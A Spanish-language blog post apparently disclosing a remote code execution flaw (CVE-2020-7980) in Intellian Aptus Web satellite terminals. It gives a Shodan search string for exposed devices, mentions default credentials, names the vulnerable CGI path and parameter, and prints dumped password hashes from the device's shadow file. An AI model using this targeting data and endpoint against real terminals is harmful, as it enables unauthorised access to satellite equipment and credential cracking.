Thursday, January 23, 2020

[Intellian] "Aptus Web" #RCE #Intellian (CVE-2020-7980)

RCE sobre Terminales Satelitales #Intellian



Vendor web: https://www.digisat.org/intellian-technologies


Intellian: Video corporativo




In The wild !
shodan dorks: title:"Intellian Aptus Web"




Buscando las credenciales por defecto en el manual





ACCESO WEB:



DASHBOARD:



POCs RCE ( CVE-2020-7980)

Path explotable:  http://<host>/cgi-bin/libagent.cgi?type=J

Variable vuln: Q

poc 1: Request to service web




.


.




POC 2:




---

intellian_admin:$1$q8wWDSXA$C0K5h910lpUPTtqH8pdRK1:13514:0:99999:7:::
intellian:$1$ycRKwsqX$kl8gAbYxppv3q4Z.S/7BT/:18280:0:99999:7:::
masteruser:$1$xFUDm.YY$2nPqTkGmeFN4xRIMNS46D0:18280:0:99999:7:::
guest:$1$zAcAbgCW$t8FXlowm9EvLScxw9PrO6.:18280:0:99999:7:::

---
id



Tested in :

"Intellian, Aptus Web V100 v1.24"
"Intellian, Aptus Web V80 v1.24"








Saludos,


Ezequiel

Autor

0 comentarios:

Post a Comment

 
biz.